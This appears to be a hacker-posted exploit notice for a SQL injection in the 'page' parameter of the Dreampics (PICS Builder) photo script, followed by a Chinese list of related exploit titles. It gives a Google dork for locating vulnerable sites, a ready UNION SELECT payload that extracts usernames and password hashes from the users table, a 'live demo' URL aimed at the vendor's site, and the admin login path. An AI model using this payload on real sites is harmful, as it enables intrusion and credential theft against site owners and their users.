#########################################################
#
# PICS BUILDER (page) SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#=========================================================
#
# script : http://www.dreamlevels.com/dreampics.php
#
# DorK : powered by Dreampics Builder
#
##########################################################
Exploit:
www.[target].com/Script/?page=-2 union select null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null from users--
L!VE DEMO:
http://www.dreamlevels.com/demo/photosite/?page=-2 union select null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null from users--
Admin Login :
/admin/
########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################
Im IRAQi
【Dreampics Builder (page) Remote SQL Injection Vulnerability】相关文章:
★ IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
★ Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
★ Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
★ minb 0.1.0 Remote Code Execution Exploit
★ HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
★ Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
★ phsBlog 0.2 Bypass SQL Injection Filtering Exploit
★ Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
★ MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
★ WebCMS Portal Edition (id) Remote SQL Injection Vulnerability